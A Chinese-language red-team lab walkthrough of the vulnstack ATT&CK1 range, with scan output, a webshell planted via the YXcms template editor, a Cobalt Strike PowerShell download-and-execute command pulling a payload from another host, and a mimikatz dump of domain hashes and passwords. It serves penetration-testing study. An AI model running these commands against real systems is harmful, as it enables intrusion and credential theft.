一,靶机描述
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:123
一、环境搭建
1.环境搭建测试
2.信息收集
二、漏洞利用
3.漏洞搜索与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集
三、内网搜集
7.内网--继续信息收集
8.内网攻击姿势--信息泄露
9.内网攻击姿势-MS08-067
10.内网攻击姿势-SMB远程桌面口令猜测
11.内网攻击姿势-Oracle数据库TNS服务漏洞
12.内网攻击姿势-RPC DCOM服务漏洞
四、横向移动
13.内网其它主机端口-文件读取
14.内网其它主机端口-redis
15.内网其它主机端口-redis Getshell
16.内网其它主机端口-MySQL数据库
17.内网其它主机端口-MySQL提权
五、构建通道
18.内网其它主机端口-代理转发
六、持久控制
19.域渗透-域成员信息收集
20.域渗透-基础服务弱口令探测及深度利用之powershell
21.域渗透-横向移动[wmi利用]
22.域渗透-C2命令执行
23.域渗透-利用DomainFronting实现对beacon的深度隐藏
24.域渗透-域控实现与利用
七、痕迹清理
25、日志清理二,靶机信息
1,网络拓扑图
2,网卡信息
| 虚拟机 | 网卡信息 | IP |
| Win7 | bridge hostonly | DHCP 192.168.52.143 |
| win2008 | hostonly | 192.168.52.138 |
| win2003 | hostonly | 192.168.52.141 |
三,信息收集
win7的phpstudy已经打开
1,主机信息确认
win7有一块网卡使用的是桥接模式,使用nmap进行扫描:nmap 192.168.1.0/24
2,nmap扫描
使用nmap对win7的外网网卡进行全方位扫描
nmap -A -P0 -p- -sS -T4 192.168.1.23 -oN nmap.A
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap ) at 2022-07-20 14:56 EDT
Nmap scan report for bogon (192.168.1.23)
Host is up (0.00065s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
|_http-title: 403 Forbidden
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1100/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
57084/tcp open tcpwrapped
MAC Address: 00:0C:29:03:EE:8B (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:03:ee:8b (VMware)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name: god
| Forest name: god
| FQDN: stu1.god
|_ System time: 2022-07-21T02:58:00+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-20T18:58:00
|_ start_date: 2022-07-20T08:10:21
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms bogon (192.168.1.23)
OS and Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.69 seconds
扫描信息分析
80端口开放,登录网站
出现这个问题的原因是虚拟主机根目录里面没有文件,或者虚拟主机根目录里面没有index.html、index.php、default.html等等。(一定注意是根目录,其他目录放了也没用。)
访问phpmyadmin试试
3,敏感信息扫描
nikto -h http://192.168.1.23
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.23
+ Target Hostname: 192.168.1.23
+ Target Port: 80
+ Start Time: 2022-07-20 15:40:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/7.3.4
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /phpMyAdmin/: phpMyAdmin directory found
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8724 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2022-07-20 15:41:46 (GMT-4) (78 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.39) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT
for a Nikto update (or you may email to sullo@cirt) (y/n)? y+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt -- Thank you!
发现有phpMyAdmin
4,敏感目录扫描
dirb http://192.168.1.23/ ~/tools/wordList/web_special_file.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Aug 2 21:04:40 2021
URL_BASE: http://192.168.1.23/
WORDLIST_FILES: /Users/root/tools/wordList/web_special_file.txt
-----------------
GENERATED WORDS: 7010
---- Scanning URL: http://192.168.1。23/ ----
+ http://192.168.1.23//phpmyadmin/ (CODE:200|SIZE:4378)
+ http://192.168.1.23//beifen.rar (CODE:200|SIZE:3142807)
+ http://192.168.1.23//phpMyAdmin/ (CODE:200|SIZE:4378)
+ http://192.168.1.23//com1 (CODE:403|SIZE:213)
+ http://192.168.1.23//com2 (CODE:403|SIZE:213)
+ http://192.168.1.23//com3 (CODE:403|SIZE:213)
+ http://192.168.1.23//com4 (CODE:403|SIZE:213)
+ http://192.168.1.23//database/% (CODE:400|SIZE:226)
+ http://192.168.1.23//phpmyadmin (CODE:301|SIZE:241)
+ http://192.168.1.23//PhpMyAdmin/ (CODE:200|SIZE:4378)
-----------------
END_TIME: Mon Aug 2 21:04:49 2021
DOWNLOADED: 7010 - FOUND: 10发现敏感文件:beifen.rar,对该进行解压缩
rar x beifen.rar
ls
beifen.rar nmap.A yxcms登录yxcm
本站为YXcms的默认演示模板,YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。
四,getshell
前台模板-管理模板文件-新建
中国蚁剑进行连接
http://192.168.1.23/yxcms/protected/apps/default/view/default/666.php查看权限
五,内网渗透
1,Cobalt Strike
(1),启动团队服务器
(2),生成Listeners
Cobalt Strike | Listeners | Add 。写入相关信息。
http_listeners 自动启动
(3),生成上线命令
Attacks | Web Drive-by | Scripted Web Delivery
复制生成的命令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.6:80/a'))"在蚁剑的虚拟端上运行该命令
2,内网信息收集
(1) 主机存活检测
Beacon 192.168.16.113 | 右键 | Explore | Port Scan
beacon> portscan 192.168.52.0-192.168.52.255 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 192.168.52.0-192.168.52.255
[+] host called home, sent: 74813 bytes
[+] received output:
(ARP) Target '192.168.52.143' is alive. 00-0C-29-E0-0A-C7
(ARP) Target '192.168.52.138' is alive. 00-0C-29-F9-1D-F2
(ARP) Target '192.168.52.141' is alive. 00-0C-29-03-3C-CD
[+] received output:
192.168.52.143:139
192.168.52.143:135
192.168.52.143:80
[+] received output:
192.168.52.141:777
192.168.52.141:139
192.168.52.141:135
[+] received output:
192.168.52.141:21 (220 Microsoft FTP Service)
[+] received output:
192.168.52.138:636
192.168.52.138:593
[+] received output:
192.168.52.138:464
[+] received output:
192.168.52.138:389
[+] received output:
192.168.52.138:139
192.168.52.138:135
192.168.52.138:88
192.168.52.138:80
[+] received output:
192.168.52.138:53
[+] received output:
192.168.52.138:445 (platform: 500 version: 6.1 name: OWA domain: GOD)
192.168.52.141:445 (platform: 500 version: 5.2 name: ROOT-TVI862UBEH domain: GOD)
192.168.52.143:445 (platform: 500 version: 6.1 name: STU1 domain: GOD)
Scanner module is complete查看在线主机
3, 域信息收集
(1)域内主机
beacon> net computers
[*] Tasked beacon to run net computers
[+] host called home, sent: 87613 bytes
[+] received output:
Computers:
[+] received output:
Server Name IP Address
----------- ----------
[+] received output:
OWA 45.56.79.23
ROOT-TVI862UBEH 192.168.52.141
STU1 192.168.52.143
4,主机密码
(1)导出主机密码
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 750674 bytes
[+] received output:
Authentication Id : 0 ; 1432192 (00000000:0015da80)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2021/8/1 23:26:51
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* LM : b73a13e9b7832a35aad3b435b51404ee
* NTLM : afffeba176210fad4628f0524bfe1942
* SHA1 : fa83a92197d9896cb41463b7a917528b4009c650
tspkg :
* Username : Administrator
* Domain : GOD
* Password : 123
wdigest :
* Username : Administrator
* Domain : GOD
* Password : 123
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : 123
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2021/8/1 23:26:39
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2021/8/1 23:26:39
SID : S-1-5-20
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 1d1ef81f6c8874e88bdf1956399e122b
* SHA1 : 21754c369e3f8186eaf62e730d8c74bd7ba57d89
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9
ssp :
credman :
Authentication Id : 0 ; 46729 (00000000:0000b689)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2021/8/1 23:26:39
SID :
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 1d1ef81f6c8874e88bdf1956399e122b
* SHA1 : 21754c369e3f8186eaf62e730d8c74bd7ba57d89
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2021/8/1 23:26:39
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9
ssp :
credman :5,内网拓展
新建SMB Listeners
Cobalt Strike | Listeners | Payload | Beacon SMB 。
更多推荐
vulnstack_ATT&CK1渗透
发布评论